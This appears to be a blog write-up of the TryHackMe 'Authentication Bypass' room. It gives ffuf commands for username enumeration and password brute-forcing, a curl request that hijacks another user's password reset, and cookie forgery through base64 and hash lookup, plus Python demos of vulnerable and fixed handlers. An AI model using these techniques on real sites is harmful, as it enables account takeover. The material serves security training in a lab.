Authentication Bypass Basics - THM

Learn how to defeat logins and other authentication mechanisms to allow you access to unauthorized areas.

In this post we will learn about the different ways website authentication mechanisms can be bypassed, defeated or broken.

These vulnerabilities can be among the most critical, as they often end in leaks of customers' personal data.

As we know, work experience and training are a must nowadays for entry-level jobs in cyber security, so check out this internship program, which has everything for you, from shadowing a real penetration testing engagement to working as a blue teamer.

Username Enumeration

It is always a good idea to build a list of valid usernames and, if possible, email addresses as well.

For demo purposes I am using the THM lab on Auth Bypass, so this blog can be taken as a writeup, but…

  • No answers are included; I want to give you a fair chance.

Website error messages are a great resource for collecting this information and building our list of valid usernames.

The Acme IT Support website has a form for creating a new user account on its signup page (http://MACHINE_IP/customers/signup).

If you enter the username admin and fill in the other form fields with fake information, you get the error "An account with this username already exists".

We can use this error message to produce a list of valid usernames already registered on the system with the ffuf tool.

ffuf submits a wordlist of commonly used usernames to the signup form and reports the ones that trigger the error:

ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://MACHINE_IP/customers/signup -mr "username already exists"

Let's break down the above ffuf command for username enumeration.

-w /usr/share/wordlists/SecLists/Usernames/Names/names.txt

This selects the wordlist of usernames to use for the fuzzing.

-X POST

This specifies the HTTP request method; the signup form is submitted with POST.

-d "username=FUZZ&email=x&password=x&cpassword=x"

This is the POST body, i.e. the fields the signup form expects, with the FUZZ keyword marking where each wordlist entry is substituted.

Remember: the x values are just dummy data. The email and password fields must be present for the form to be processed, but their contents do not matter for this check.

-H "Content-Type: application/x-www-form-urlencoded"

The server only parses the POST body as form data when this header is present; without it the username is never read, so every request gets the same response and you get either false positives or no matches at all.

-u http://MACHINE_IP/customers/signup

This specifies the target URL where the fuzzing takes place.

-mr "username already exists"

This is the most important part of the command: -mr keeps only responses whose body matches the given regular expression. The string differs between applications depending on how the web app reports the error, but here "username already exists" is the message returned when the username is taken.

Now let's put the command together and run it; the full working command is the one shown above.

Now you can answer the questions attached to the task!

Don't forget to save the valid usernames in a .txt file, one per line, so we can brute-force their passwords next.

Brute-forcing

A brute force attack is an automated process that tries a list of commonly used passwords against either a single username or, as in our case, a list of usernames.

When running this command, make sure the terminal is in the same directory as the valid_usernames.txt file.

ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://MACHINE_IP/customers/login -fc 200

Note: when there is more than one position to fuzz, give each wordlist its own keyword. Above, the :W1 and :W2 suffixes name the two lists, and the keywords are then used in the POST data; in ffuf's default clusterbomb mode every password is tried against every username.

Let's break down the above ffuf command for brute-forcing the login page:

-w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2

This specifies the list of valid usernames and the password list we want to use, each with its keyword.

-X POST -d "username=W1&password=W2"

This is the POST body with the two brute-force positions.

-H "Content-Type: application/x-www-form-urlencoded"

Here we have specified the Content-Type header, needed for the same reason as before.

-u http://MACHINE_IP/customers/login

This specifies our target URL.

-fc 200

This filters out responses with status code 200. A failed login re-renders the login page with a 200, whereas a successful login is normally answered with a redirect (for example 302), so hiding the 200s leaves only the working credential pairs. Check what the target actually returns first: if failures also redirect, filter on response size (-fs) or on a string in the body (-fr) instead.

Now put the full command together and run it against http://MACHINE_IP/customers/login.

Now answer the questions on your own.

Logic Flow

Sometimes authentication processes contain logic flaws.

A logic flaw is when the typical logical path of an application is bypassed, circumvented or manipulated by an attacker.

Logic flaws can exist in any area of a website, but here we concentrate on examples relating to authentication.

Without getting into theory, let's move to the practical part.

Create an account on Acme IT Support.

You will be given a mailbox of the form {username}@customer.acmeitsupport.thm; for the account rahul this is rahul@customer.acmeitsupport.thm.

The password reset form identifies the account with the email passed in the query string, but the reset link itself is sent to whatever email address is supplied in the POST body. So we request a reset for robert while pointing the delivery at our own mailbox with curl:

curl 'http://10.10.65.198/customers/reset?email=robert@acmeitsupport.thm' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=robert&email=rahul@customer.acmeitsupport.thm'

After submitting this, Robert's reset email arrives in your own inbox.

Reset Robert's password, log in as him and collect the flag.

Hurray, account takeover done!
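To make the flaw concrete, here is an added example that is not code from the THM room or the original post (the Acme app's source is not shown in the room). It models the reset endpoint two ways: a vulnerable handler that validates the account against the query-string email but mails the link to the body email, and a fixed handler that only ever mails the address on file. The user table, the outbox and the handler shapes are constructed; the request is the curl above with the lab IP replaced by the MACHINE_IP placeholder.

```python
"""Password-reset logic flaw modelled on the curl request above: the
account is selected by one email field and the reset link is sent to
another, attacker-supplied one.

Added example, not code from the THM room or the original post. The user
table, the outbox and the two handlers are constructed to reproduce the
behaviour the request exploits; the real Acme app's source is not shown
in the room."""
import secrets
from urllib.parse import parse_qs, urlparse

USERS = {  # constructed: username -> email on file
    "robert": "robert@acmeitsupport.thm",
    "rahul": "rahul@customer.acmeitsupport.thm",
}
OUTBOX = []  # (recipient, username, token): what the mail server would send


def _field(qs, name, default=""):
    """First value of a form/query field, or default if absent."""
    return parse_qs(qs).get(name, [default])[0]


def _send_reset(recipient, username):
    OUTBOX.append((recipient, username, secrets.token_hex(8)))


def vulnerable_reset(url, body):
    """Step 1 checked ?email= against the account, but step 2 sends the
    link to the email in the POST body, which the client controls."""
    username = _field(body, "username")
    if USERS.get(username) != _field(urlparse(url).query, "email"):
        return 400, "Account not found"
    recipient = _field(body, "email", USERS[username])   # the flaw
    _send_reset(recipient, username)
    return 200, "Reset email sent to " + recipient


def fixed_reset(url, body):
    """Only the address on file ever receives the link; the body email is
    ignored, and the reply is the same whether or not the account exists."""
    username = _field(body, "username")
    if USERS.get(username) == _field(urlparse(url).query, "email"):
        _send_reset(USERS[username], username)
    return 200, "If that account exists, a reset email has been sent"


def attacker_request(handler):
    """The curl from the text: target robert, point delivery at our inbox.
    Returns the addresses that received robert's reset link."""
    OUTBOX.clear()
    url = "http://MACHINE_IP/customers/reset?email=robert@acmeitsupport.thm"
    body = "username=robert&email=rahul@customer.acmeitsupport.thm"
    handler(url, body)
    return [recipient for recipient, user, _ in OUTBOX if user == "robert"]


if __name__ == "__main__":
    print("vulnerable:", attacker_request(vulnerable_reset))
    print("fixed:     ", attacker_request(fixed_reset))
```

With the vulnerable handler the only copy of Robert's reset link lands in rahul's mailbox; with the fixed handler it goes to Robert, and the uniform reply also stops the endpoint being used for username enumeration.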

Cookie Tampering

Examining and editing the cookies set by the web server during your online session can have multiple outcomes, such as unauthenticated access, access to another user’s account, or elevated privileges.

Cookies in Plain Text

The contents of some cookies are in plain text, and it is obvious what they do. Take, for example, these cookies set after a successful login:

Set-Cookie: logged_in=true; Max-Age=3600; Path=/
Set-Cookie: admin=false; Max-Age=3600; Path=/

We see one cookie (logged_in), which appears to control whether the user is currently logged in, and another (admin), which controls whether the visitor has admin privileges.

Following this logic, if we change the cookie values and make a request, we can change our privileges.

First, we'll start just by requesting the target page without any cookies:

curl http://MACHINE_IP/cookie-test

Then repeat the request with the two cookies set to logged_in=true and admin=true in the Cookie header and compare the responses. Burp Suite's Repeater is a good alternative to curl here. Follow the steps in the room to get your flag.

Hashing

Sometimes cookie values look like a long string of random characters; these may be hashes, an irreversible representation of the original text. Here are some examples that you may come across, all produced from the same original string:

Original string: 1

md5: c4ca4238a0b923820dcc509a6f75849b
sha-256: 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
sha-512: 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

You can see from the above that the output for the same input string differs significantly depending on the hash method. Even though a hash is irreversible, the same input always produces the same output, which is helpful for us: services such as https://crackstation.net/ keep databases of billions of hashes and their original strings, so a cookie that is just the hash of a short value like a user ID can be recovered by lookup and a replacement computed for another ID.

Encoding

Encoding is similar to hashing in that it produces what looks like a random string of text, but, unlike hashing, encoding is reversible.

So it begs the question: what is the point of encoding?

Encoding allows us to convert binary data into human-readable text that can be easily and safely transmitted over mediums that only support plain-text ASCII characters.

Common encoding types are base32, which converts binary data to the characters A-Z and 2-7, and base64, which uses the characters a-z, A-Z, 0-9, + and /, with = for padding.

Take the below cookie as an example, set by the web server upon logging in:

Set-Cookie: session=eyJpZCI6MSwiYWRtaW4iOmZhbHNlfQ==; Max-Age=3600; Path=/

Base64-decoded, this string has the value {"id":1,"admin":false}. We can set the admin value to true, base64-encode it again and send it back, which gives us admin access. This only works because the server trusts the cookie contents as-is; a cookie that is signed or checked against server-side session state will reject the modified value.
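The following is an added example, not code from the THM room or the original post. It works through both the Hashing and Encoding sections above: decoding and re-encoding the session cookie quoted in the text with admin flipped to true, an offline stand-in for a crackstation-style lookup that recovers the original string behind the md5 and sha-256 values from the table, and the HMAC-signed cookie a server would use so that the same forgery is rejected. The candidate list for the lookup and the server secret are constructed for the demo.

```python
"""Cookie tampering for base64-encoded and hashed values, and the HMAC
signature that defeats it.

Added example, not code from the THM room or the original post. The
session cookie and the hashes are the ones quoted in the text; the
candidate list for the lookup and the server secret are constructed."""
import base64
import hashlib
import hmac
import json

SESSION_COOKIE = "eyJpZCI6MSwiYWRtaW4iOmZhbHNlfQ=="   # from the Set-Cookie header above
SERVER_SECRET = b"constructed-demo-secret"           # constructed; never leaves the server


def decode_session(value):
    """Base64 cookie value -> dict."""
    return json.loads(base64.b64decode(value))


def forge_session(value, **changes):
    """Decode, overwrite fields (e.g. admin=True), re-encode.
    Works only while the server trusts the cookie's content as-is."""
    data = decode_session(value)
    data.update(changes)
    packed = json.dumps(data, separators=(",", ":")).encode()
    return base64.b64encode(packed).decode()


def lookup_hash(digest, candidates):
    """Offline stand-in for a hash-lookup site: hash each candidate with
    md5, sha-256 and sha-512 and return (algorithm, plaintext) on a match.
    Short, predictable inputs such as a user id fall to this instantly."""
    digest = digest.lower()
    for plain in candidates:
        for algo in ("md5", "sha256", "sha512"):
            if hashlib.new(algo, plain.encode()).hexdigest() == digest:
                return algo, plain
    return None


def sign_session(data):
    """Server side: base64(payload) + '.' + HMAC-SHA256(secret, payload)."""
    payload = base64.b64encode(json.dumps(data, separators=(",", ":")).encode()).decode()
    tag = hmac.new(SERVER_SECRET, payload.encode(), hashlib.sha256).hexdigest()
    return payload + "." + tag


def verify_session(cookie):
    """Server side: return the session dict, or None if the tag does not
    match the payload (tampered or forged cookie)."""
    payload, sep, tag = cookie.rpartition(".")
    if not sep:
        return None
    expected = hmac.new(SERVER_SECRET, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):
        return None
    return decode_session(payload)


def run_demo():
    forged = forge_session(SESSION_COOKIE, admin=True)
    signed = sign_session({"id": 1, "admin": False})
    payload, _, tag = signed.rpartition(".")
    tampered = forge_session(payload, admin=True) + "." + tag   # old tag, new payload
    return {
        "original": decode_session(SESSION_COOKIE),
        "forged": decode_session(forged),
        "md5_lookup": lookup_hash("c4ca4238a0b923820dcc509a6f75849b",
                                  [str(i) for i in range(1000)]),
        "signed_ok": verify_session(signed),
        "tampered_ok": verify_session(tampered),
    }


if __name__ == "__main__":
    print(json.dumps(run_demo(), indent=2))
```

The forged cookie decodes to {"id":1,"admin":true} and would be accepted by a server that only base64-decodes, while the same edit to the signed cookie fails verification because the attacker cannot recompute the tag without the secret; the lookup finds that the md5 in the table is simply the hash of "1".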

Now you can answer the question on your own. To decode and encode base64 you can use: https://www.base64encode.org/

Thanks for following along, here is the room link:

https://tryhackme.com/room/authenticationbypass

Rahul Bhichher

Cyber Security Engineer at Quantiphi, AWS Community Builder, Volunteer at HIH Community